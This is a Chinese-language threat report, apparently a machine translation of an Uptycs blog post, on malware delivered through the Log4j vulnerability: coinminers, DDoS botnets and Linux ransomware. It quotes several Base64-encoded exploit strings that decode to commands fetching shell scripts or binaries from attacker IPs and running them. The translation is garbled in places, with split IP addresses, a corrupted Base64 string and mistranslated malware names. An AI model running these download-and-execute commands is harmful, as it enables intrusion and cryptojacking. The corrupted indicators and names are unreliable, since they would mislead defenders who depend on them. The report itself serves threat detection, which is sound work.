盤點:Log4j 漏洞帶來的深遠影響
上周,Log4j 漏洞顛覆了互聯(lián)網(wǎng),影響是巨大。攻擊者也已經(jīng)開始利用該漏,到目前為止,Uptycs 研究人員已經(jīng)觀察到與 coinminers、DDOS 惡意軟件和一些勒索軟件變種相關(guān)的攻擊,這些攻擊積極利用了此漏洞。
未來幾天勒索軟件攻擊的規(guī)模可能會增加。由于該漏洞非常嚴重,因此可能還會發(fā)現(xiàn)一些可以繞過當前補丁級別或修復程序的變體。因針對這種攻擊持續(xù)監(jiān)控和強化系統(tǒng)是極其重要的。
Uptycs 此前在博客中為其客戶分享了有關(guān)補救和檢測步驟的詳細信息 。并討論了攻擊者利用 Log4j 漏洞的各種惡意軟件類別。Uptycs 威脅研究團隊確定了投放在易受攻擊的服務器上的不同類型的有效載荷。有效載荷包括著名的惡意軟件,如 Kinsing 和 Xmrig coinminers,以及 Dofloo、Tsunami 和 Mirai 僵尸網(wǎng)絡惡意軟件。除了這些惡意軟件系列,攻擊者已經(jīng)開始在在易受CVE-2021-44228服務器上部署勒索軟件。
1. Xmrig
Xmrig 是一個開源的 Monero CPU Miner,用于挖掘 Monero 加密貨幣。攻擊者利用 Log4j2 漏洞后,攻擊者試圖運行惡意 shell 腳本,其中包含下載 xmrig 礦工的命令。
命令是 93.189.42 8 []:5557,/基本/命令/ Base64/編碼 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。
此命令下載礦工shell 腳本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6
shell 腳本(見圖 1)首先殺死已經(jīng)在運行的礦工二進制文件,然后從互聯(lián)網(wǎng)下載 xmrig 礦工二進制文件并運行它。
圖 1:Shell 腳本下載并執(zhí)行 Xmrig
2. Kinsing
Kinsing 是一種自我傳播的加密挖掘惡意軟件,以前針對配置錯誤的開放 Docker Daemon API 端口。Kinsing 惡意軟件是用 golang 編寫的,通常是通過惡意 shell 腳本刪除的。kinsing shell 腳本包括幾種防御規(guī)避技術(shù),如 setfacl 使用、chattr 使用、日志刪除命令等。
大規(guī)模掃描后的攻擊者試圖在易受攻擊的服務器上放置 kinsing 二進制文件。攻擊者用來刪除和運行 shell 腳本的:92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.
在shell腳本:7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中,我們可以看到攻擊者在 shell 腳本運行時放置了刪除 kinsing 惡意軟件二進制文件的命令(見圖 2)。
圖 2:通過 shell 腳本下載 Kinsing
kinsing shell 腳本還包含與 docker 相關(guān)的命令,這些命令會殺死受害系統(tǒng)上已經(jīng)運行的礦工進程(如果存在)。
圖 3:用于殺死已經(jīng)運行的礦工的 docker 命令
3. DDoS 僵尸網(wǎng)絡負載
在一些漏洞利用嘗試中,攻擊者試圖刪除分布式拒絕服務 (DDoS) 惡意軟件二進制文件,如 dofloo、Mirai。
4. Dofloo
Dofloo (又名 AeSDdos,flooder)是一種DDoS類型的惡意軟件,可對目標 IP 地址進行各種泛洪攻擊,如 ICMP 和 TCP。除了泛洪攻擊外,Dofloo 通過操縱受害者系統(tǒng)中的 rc.local 文件來確保其持久性。它的一些變體在受害計算機上部署了加密貨幣礦工。
在情報系統(tǒng)中,攻擊者也在利用易受攻擊的服務器后投放 Dofloo 惡意軟件。由攻擊者使用完整的命令是 81.30.157 43 []:1389,/基本/命令/ Base64編碼/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下圖(參見圖 4)顯示了 Dofloo 對 rc.local 的操作:6e8f2da2a4facc2011522dbcdacA509195bfbdb84dbdc840382b9c40d7975548)在 Log4j 后利用中使用的變體。
圖 4:Dofloo 操作 rc.local
5. mushtik
海嘯(又名mushtik)是基于DDoSflooder一個跨平臺的惡意軟件,在下載文件過程中被感染系統(tǒng)中執(zhí)行shell的命令。海嘯樣本:4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用 crontab 作為持久性。除了持久性,它還刪除一個副本 /dev/shm/ 目錄作為防御規(guī)避策略(參見圖 5)。
圖 5:Tsunami 通過 cron 從 /dev/shm 運行
6. Mirai
Mirai是一種惡意軟件,它感染在 ARC 處理器上運行的智能設備,將它們變成一個遠程控制的機器人網(wǎng)絡。Mirai 還通過惡意 shell 腳本傳送。攻擊者使用的命令是 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。該命令使用 wget 實用程序從攻擊者 C2,62.210.130[.]250 中刪除 Mirai 惡意軟件(見圖 6)。
圖 6:從 C2 下載 mirai 的 Shell 腳本
7. Linux
攻擊者還利用 Log4j 漏洞在易受攻擊的服務器上投放 Linux 勒索軟件。攻擊者在利用 Log4j 漏洞后試圖刪除Linux 勒索軟件:5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索軟件是用 golang 編寫的,并操縱 ssh 文件在受害者系統(tǒng)中傳播自身。攻擊者丟棄的贖金票據(jù)如下所示(見圖 7)。
圖 7:Linux 贖金說明
8. Uptycs EDR
Uptycs EDR 使用映射到 MITRE ATT&CK 和 YARA 進程掃描的行為規(guī)則成功檢測到所有有效負載。下面顯示了我們的行為規(guī)則主動檢測到的 Linux 勒索軟件的示例(參見圖 8)。
圖 8:使用 Uptycs EDR 檢測勒索軟件
9. Xmrig
除了行為規(guī)則之外,當 YARA 檢測被觸發(fā)時,Uptycs EDR 通過威脅研究團隊策劃的 YARA 規(guī)則分配威脅配置文件。用戶可以導航到檢測警報中的工具包數(shù)據(jù)部分,然后單擊名稱以查找工具包的說明。Uptycs EDR 檢測到的 Xmrig 惡意軟件活動的摘錄如下所示(見圖 9)。
圖 9:使用 Uptycs EDR 進行 XMrig 檢測
